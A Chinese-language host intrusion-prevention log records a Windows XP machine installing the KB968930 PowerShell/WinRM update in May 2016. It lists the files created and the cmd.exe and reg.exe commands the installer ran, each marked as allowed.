2016-5-14 星期六 23:51:43        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.security.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:43        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.wsman.management.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:43        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.wsman.management.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:43        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.wsman.runtime.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:44        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\powershell_ise.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:44        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\pspluginwkr.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:44        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\pwrshmsg.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:45        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\pwrshplugin.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:45        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\pwrshsip.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:45        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\spmsg.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:45        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\system.management.automation.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:46        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\system.management.automation.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:46        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wevtfwd.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:46        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrmprov.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:46        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrscmd.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:47        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrsmgr.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:47        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrssrv.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:47        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmauto.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:48        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmplpxy.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:48        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmres.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:48        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmsvc.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:48        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmwmipl.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:49        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\powershell.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:49        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\powershell_ise.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:49        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\pscustomsetuputil.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:50        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\pssetupnativeutils.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:50        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\spuninst.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:50        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\spupdsvc.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:50        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrs.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:51        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrshost.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:51        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmanhttpconfig.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:51        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\wsmprovhost.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:52        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\powershell.exe.mui        允许        [文件组]所有执行文件 -> [文件]*; *.mui        
2016-5-14 星期六 23:51:53        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrm.vbs        允许        [文件组]所有执行文件 -> [文件]*; *.vbs        
2016-5-14 星期六 23:51:53        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\update\spcustom.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:54        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\update\updspapi.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:54        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\update\update.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:57        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建新进程        c:\02dbcaae2af0f0c0a87287\update\update.exe        允许        [应用程序]*        命令行: c:\02dbcaae2af0f0c0a87287\update\update.exe  /quiet /norestart
2016-5-14 星期六 23:52:01        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\reg.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration                /f
2016-5-14 星期六 23:52:03        c:\windows\system32\reg.exe        创建新进程        c:\windows\system32\conime.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\conime.exe
2016-5-14 星期六 23:52:03        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0
2016-5-14 星期六 23:52:04        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0
2016-5-14 星期六 23:52:04        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0
2016-5-14 星期六 23:52:05        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0
2016-5-14 星期六 23:52:06        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0
2016-5-14 星期六 23:52:06        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_._31bf3856ad364e35\System.Management.Automation.resources.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0\.
2016-5-14 星期六 23:52:07        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0\.
2016-5-14 星期六 23:52:08        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0\.
2016-5-14 星期六 23:52:08        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0\.
2016-5-14 星期六 23:52:09        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\cmd.exe /c copy /y C:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll C:\WINDOWS\system32\WindowsPowerShell\v1.0\.
2016-5-14 星期六 23:52:09        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c md C:\WINDOWS\$NtUninstallKB968930$\.
2016-5-14 星期六 23:52:10        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y "C:\Documents and Settings\All Users\「开始」菜单\程序\Windows PowerShell 1.0\Windows PowerShell.lnk" "C:\WINDOWS\$NtUninstallKB968930$\Windows PowerShell.lnk"
2016-5-14 星期六 23:52:11        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_globbing.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_globbing.help.txt
2016-5-14 星期六 23:52:11        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_command_search.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_command_search.help.txt
2016-5-14 星期六 23:52:12        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_associative_array.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_associative_array.help.txt
2016-5-14 星期六 23:52:12        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_array.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_array.help.txt
2016-5-14 星期六 23:52:12        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_alias.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_alias.help.txt
2016-5-14 星期六 23:52:13        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_escape_character.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_escape_character.help.txt
2016-5-14 星期六 23:52:13        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_environment_variable.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_environment_variable.help.txt
2016-5-14 星期六 23:52:14        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_object.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_object.help.txt
2016-5-14 星期六 23:52:14        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_parameter.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_parameter.help.txt
2016-5-14 星期六 23:52:15        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_display.xml.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_display.xml.help.txt
2016-5-14 星期六 23:52:15        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_operator.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_operator.help.txt
2016-5-14 星期六 23:52:16        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_namespace.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_namespace.help.txt
2016-5-14 星期六 23:52:16        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_flow_control.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_flow_control.help.txt
2016-5-14 星期六 23:52:17        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_logical_operator.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_logical_operator.help.txt
2016-5-14 星期六 23:52:17        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_location.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_location.help.txt
2016-5-14 星期六 23:52:17        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_execution_environment.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_execution_environment.help.txt
2016-5-14 星期六 23:52:18        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_method.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_method.help.txt
2016-5-14 星期六 23:52:18        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_filter.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_filter.help.txt
2016-5-14 星期六 23:52:19        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_function.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_function.help.txt
2016-5-14 星期六 23:52:19        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_types.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_types.help.txt
2016-5-14 星期六 23:52:20        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_shell_variable.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_shell_variable.help.txt
2016-5-14 星期六 23:52:20        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_system_state.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_system_state.help.txt
2016-5-14 星期六 23:52:21        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_property.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_property.help.txt
2016-5-14 星期六 23:52:21        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_wildcard.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_wildcard.help.txt
2016-5-14 星期六 23:52:21        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_where.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_where.help.txt
2016-5-14 星期六 23:52:22        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_provider.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_provider.help.txt
2016-5-14 星期六 23:52:22        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_pipeline.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_pipeline.help.txt
2016-5-14 星期六 23:52:23        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_regular_expression.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_regular_expression.help.txt
2016-5-14 星期六 23:52:23        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_script_block.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_script_block.help.txt
2016-5-14 星期六 23:52:24        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\about_scope.help.txt C:\WINDOWS\$NtUninstallKB968930$\.\about_scope.help.txt
2016-5-14 星期六 23:52:24        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\gettingstarted.rtf C:\WINDOWS\$NtUninstallKB968930$\.\gettingstarted.rtf
2016-5-14 星期六 23:52:25        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\releasenotes.rtf C:\WINDOWS\$NtUninstallKB968930$\.\releasenotes.rtf
2016-5-14 星期六 23:52:25        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\quadfold.rtf C:\WINDOWS\$NtUninstallKB968930$\.\quadfold.rtf
2016-5-14 星期六 23:52:26        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c move /y C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\userguide.rtf C:\WINDOWS\$NtUninstallKB968930$\.\userguide.rtf
2016-5-14 星期六 23:52:28        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:29        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:52:37        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\_000002_.tmp.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:38        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrm.cmd        允许        [文件组]所有执行文件 -> [文件]*; *.cmd        
2016-5-14 星期六 23:52:38        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrm.vbs        允许        [文件组]所有执行文件 -> [文件]*; *.vbs        
2016-5-14 星期六 23:52:38        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WsmAuto.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:39        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WsmSvc.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:39        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WsmWmiPl.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:40        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WsmRes.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:40        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrs.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:52:41        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrshost.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:52:42        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrscmd.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
